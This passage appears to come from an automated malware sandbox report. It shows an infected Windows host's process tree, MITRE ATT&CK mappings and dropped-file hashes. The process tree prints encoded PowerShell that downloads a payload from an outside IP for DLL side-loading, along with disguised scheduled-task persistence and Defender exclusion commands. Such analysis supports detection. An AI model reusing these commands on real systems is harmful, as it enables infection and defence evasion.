        C:\Windows\SysWOW64\WerFault.exe -u -p 9536 -s 1520
        5⤵
        Program crash
        
        PID:5352
  - - C:\Users\Admin\Desktop\Files\hfs.exe
      "C:\Users\Admin\Desktop\Files\hfs.exe"
      4⤵
      PID:5380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1172,i,15443894719155957647,11950850699377864739,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:3460

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3436 -ip 3436
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4464 -ip 4464
1⤵
PID:4832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:6080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4e6acc40,0x7ffb4e6acc4c,0x7ffb4e6acc58
  2⤵
  PID:6100

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1480

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:4348

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:5240

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\Admin\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
1⤵
PID:5552

C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
1⤵
PID:4024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3704

C:\Windows\system32\cmd.exe
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
1⤵
PID:6820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7668

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
1⤵
PID:7240

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
PID:1852

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:8064
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7252

C:\Windows\system32\cmd.exe
cmd /c copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\Updater.vbs.exe" /Y
1⤵
- Process spawned unexpected child process
PID:8156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4792

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:7120

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:7504

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:2536

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:3188

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:2900

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:5340

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:3696

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:7416

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:5724

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:5380

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:7628

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:7464

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:7484

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:7448

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:9140

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:8180

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:7808

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:10056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10032 -ip 10032
1⤵
PID:7648

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:6536

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:8900

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004B4 0x00000000000004D0
1⤵
PID:8936

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:5420

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:9256

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:2292

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:3812

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:8524

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:6476

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:8236

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
1⤵
PID:10144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 8 -ip 8
1⤵
PID:10036

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:3884

C:\ProgramData\gvudiuj\uptuag.exe
C:\ProgramData\gvudiuj\uptuag.exe
1⤵
PID:3872
- C:\ProgramData\gvudiuj\uptuag.exe
  "C:\ProgramData\gvudiuj\uptuag.exe"
  2⤵
  PID:7584

C:\Users\Admin\AppData\Roaming\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive.exe
1⤵
PID:5944

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
- Network Service Discovery
PID:2428

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:5820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
PID:9716

C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
1⤵
PID:2740

C:\ProgramData\gvudiuj\uptuag.exe
C:\ProgramData\gvudiuj\uptuag.exe
1⤵
PID:7888
- C:\ProgramData\gvudiuj\uptuag.exe
  "C:\ProgramData\gvudiuj\uptuag.exe"
  2⤵
  PID:9596

C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
1⤵
PID:2836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 9536 -ip 9536
1⤵
PID:6480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Archivos de programa\Unico - Ventas\ODBC_VEN.exe

Filesize
968KB

MD5
64e7c3e96a954a42bb5f29a0af1a6b3e

SHA1
38e4194c69b5b5f8bac1818f45d23b9465b220c9

SHA256
acda53d2a8f0d67a56e49b4f93d4f95e19e6ac7e35da9ba281314c67f4ef4671

SHA512
80fd63b8279dadd805a855d222d370698e2b0ba69f6d2f28c39ac0bc8b6191da05cc51ad174112628cc4e56b2a7e59d3cafc55361b77fa4c12dde33f88a6a551

Download Submit
C:\Archivos de programa\Unico - Ventas\odbc.ini

Filesize
234B

MD5
ae975648280d07029fb1cc5c424a7fed

SHA1
4904248e2b2403c0e8d98ef08e4ad86549d02eb2

SHA256
5cdf5c3ac6274a8098856150572ddd3484f3c8039dc303a003e009d51c32de74

SHA512
656b867ac68f3405b0f2eae28984d2132ab34cdfa59cecb734523e675e78f3aa95b77950875f9dbf3c23c671dc42cdb720de2b811804db8e0b20544f257be44d

Download Submit
C:\Archivos de programa\Unico - Ventas\odbc.ini

Filesize
234B

MD5
9ccfc58e3f9b3f7c1977a23d45598691

SHA1
938f692e7610cd25e7c8fcbc3813c2e766400df7

SHA256
55b82d79e9e84a44e4c917bc8efc180a47e4d30f53bc966648cd491c0b575c6e

SHA512
682d63eece6978df000feb2e5a1c60d0e42f1cbd19f06c3aa21323b91a758f05bd2c655e9aa49d9a5427346a3c16d7a6175195fc40f15b05d2dd231ada74b003

Download Submit
C:\ProgramData\ED Video Splitter 11.5.45\ED Video Splitter 11.5.45.exe

Filesize
4.1MB

MD5
3e5665842edf692c5da51975bea8be54

SHA1
df865efaaa7de117b983588fefd7474053cf3bff

SHA256
21e988aa820894faeb5f57171734501a444be9ac2758a2b17bcc9a4b677ba495

SHA512
75b721cb68c254c6ba26d82cbbb38ace5928a386d5428f651e56734a1a70de55c315378e8bc2d95b26f90b51095229e1ce5f239c177dff1204e31d18cc4a486d

Download Submit
C:\ProgramData\chrome.dll

Filesize
676KB

MD5
eda18948a989176f4eebb175ce806255

SHA1
ff22a3d5f5fb705137f233c36622c79eab995897

SHA256
81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4

SHA512
160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
1b0498fb3e281b171886fd9c8a354801

SHA1
203277e30efcf42c11fbbf505ca92f4e4beaf777

SHA256
8ab72917031462b99cf8759ffd61c33297b7ce6cdcb38420e6ca1a60d4b64307

SHA512
37eac8442344958f82e9b550a3fd62bc88644ae2d02b1f9f20ae9b1faaf83f5d0098a74b9849ae9a0f0ba170242275bebd984ac0c823b27b1afbf6996c8942e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
336B

MD5
c248688a278215f4f3c7cb088df9ac19

SHA1
c8fe01c705a1636b7cd55f9954c2dca261f9b362

SHA256
e004362adfc60232d758dcf6fa3b76bba462ccefbff004f6604538ebb545d192

SHA512
ebac857a8e7dc17147f79aa4aae809b4e09e73c9884d876ef8f48aee2c19d6dafbf85a5162d05bf178c316908b36add3a2292cb75af5dacd613b1aaa17e9e72a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
a8033e6c0797909766fe27c8702dfe87

SHA1
950d5ad692e443dbe3bd8647658e06413d70b9ad

SHA256
2af41b734ece79756a384fd15f4a82cb913694746aab77ab9071aa54c707bb36

SHA512
dac24e5de6b8ad9b6d5ac69956e46544c3c95e396c76fd481aae57eaa243611d6e2466d4f1cd268a85d691ab2dedf328c600e1ca06b1a2b2ca683b9a4a1d5d55

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
4KB

MD5
eb6f3feed814cbf67441de0781d15ea4

SHA1
8ea3c2ec59dde0b0d4422215b649bbe0c8a9534d

SHA256
125b9bbbf2f3a5c4e2e4636ec02738b1990e038000cfc77798cfbbdfbf3b1006

SHA512
1cea730450a03ec72e84917507d30db887e345eb05081801eccb60f78a167d528af3b31945790e8f2d74eb60f4b4b69ec629a3d56b998ed05db84639a38426fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
690B

MD5
78140cc60a2d16df2729edb989262252

SHA1
fe406482c17dd2edbedfa3b0e4cf41344be5621b

SHA256
8ae7e315e6587e15d06a7bdc811ba2b28d13586d19c9df5200e762812b05d38c

SHA512
ceb562fc5012f8f986699dd59feaf6ff941f0cc8ecfe34998f1edb467b84d8439e58aeee09fb703f8c2344ff294d647d067aece7d8f467cd9e7729ab2d563dbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
62112df119a0f5c9fbe81b78270244a1

SHA1
46c31b91cace4ff023b59c0129e85638b33834dc

SHA256
abf100b7126edd23ab00f026c49c2e77b3645498c1883a79a3286a3c719bad46

SHA512
7d39174ebdd14fdffc443872d2259d8dcede815d7eaa8d62a889196e7c35a6c8af5820cc800cc3ebe4d6536f8f6b1763528a0321946ea9af579051f3986c5134

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
c744a096b488bd7652900f6751009c0c

SHA1
a3312ead12dbd817cd8cf6f58a839c671bc6d5e5

SHA256
36ca87b1b1dade343f167d97e0fc75abab9c11b616f551c4e6ea08458a61d13e

SHA512
4a2716faaa780bc766413543f58dd1755881af1ff1675d74065108759b89b98e22b1b5aabcf366e3720dcf94fef436a1a28ef7cdd578f10eb9f09ae16f32cdbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
4a6d4f64eb4e34352fbcfc025e429e1d

SHA1
fa3b60cd900f2ac5559f2b089fe9c6c38916731f

SHA256
c4bfe25f16d4c8dcf1ea303527f3857fe4a0f8a2eb2a1d7dc0a65713384ec06b

SHA512
580ae974db8a742cff20b8e28517852d74924fc191fe9ac63e166c960b8acd03f81c1a541178014c197f55b94c37de984aedf014f42aa48012cc240285473ddc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
48a83e769e352660025a0fec3e2fc2a6

SHA1
585e0753dcc23b1465cc9545c93968640bebf400

SHA256
9c41f60f04bd0318fed5339077aa950ddf392b54cf94829d47646a078c465bf6

SHA512
f20bbea6a6466cad846cb5bb57123fb95593b1db9525ee4c091b24a64fc130b35de38fd5599ae2d0c34d51859b0b63a2e19dda52d9a225b4dad59082f5f34fc7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
6b52fb24e4b0a7e8004afa66dc46ad5b

SHA1
4c9b37132e043659ace8625a3358136584e1d7e2

SHA256
e1e864a86e071c3a18de41284a5744f13b6d1e80505964685800a335e680907d

SHA512
cdf313ba62d619bdeae24f04e811ff1d98cc8546fd5439c3aab02eb1efaa745259873f43e9415d8bc94f84eb1fd9237e425ad095dd2dee7c352c6be115bf9f3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b47d7002bcbc0c027376fc01c26e391e

SHA1
29630319a1d8b3bc25915e3b4cdb04df438dd745

SHA256
6a52998688de86095f6742de55e45e3366b3efd3776c1c27090d5314540ea50e

SHA512
